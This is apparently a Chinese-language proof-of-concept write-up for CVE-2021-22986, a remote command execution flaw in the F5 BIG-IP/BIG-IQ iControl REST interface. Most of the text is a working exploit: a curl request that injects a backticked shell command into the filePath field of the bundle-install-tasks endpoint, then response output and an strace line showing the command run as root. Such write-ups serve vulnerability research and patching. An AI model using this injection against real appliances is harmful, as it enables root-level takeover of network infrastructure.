BIG-IP- BIG-IQ iControl REST 未经身份验证的RCE (CVE-2021-22986).md
1.46 KB / 2021-05-21 09:14:38
# BIG-IP/ BIG-IQ iControl REST 未经身份验证的RCE (CVE-2021-22986)
此漏洞允许未经身份验证的攻击者通过BIG-IP管理界面和IP地址,对iControl REST接口进行网络访问,以执行任意系统命令,创建或删除文件以及禁用服务。此漏洞只能通过control plane利用,而不能通过 data plane利用。
详情:https://attackerkb.com/topics/J6pWeg5saG/k03009991-icontrol-rest-unauthenticated-remote-command-execution-vulnerability-cve-2021-22986
**PoC:**
```json
wvu@kharak:~$ curl -ksu admin:[redacted] https://192.168.123.134/mgmt/tm/access/bundle-install-tasks -d '{"filePath":"`id`"}' | jq .
{
"filePath": "`id`",
"toBeInstalledAppRpmsIndex": -1,
"id": "36671f83-d1be-4f5a-a2e6-7f9442a2a76f",
"status": "CREATED",
"userReference": {
"link": "https://localhost/mgmt/shared/authz/users/admin"
},
"identityReferences": [
{
"link": "https://localhost/mgmt/shared/authz/users/admin"
}
],
"ownerMachineId": "ac2562f0-e41f-4652-ba35-6a2b804b235e",
"generation": 1,
"lastUpdateMicros": 1615930477819656,
"kind": "tm:access:bundle-install-tasks:iappbundleinstalltaskstate",
"selfLink": "https://localhost/mgmt/tm/access/bundle-install-tasks/36671f83-d1be-4f5a-a2e6-7f9442a2a76f"
}
wvu@kharak:~$
```
ID将以ROOT身份执行。
```
[pid 64748] execve("/bin/tar", ["tar", "-xf", "uid=0(root)", "gid=0(root)", "groups=0(root)", "context=system_u:system_r:initrc_t:s0", "-O"], [/* 9 vars */]) = 0
```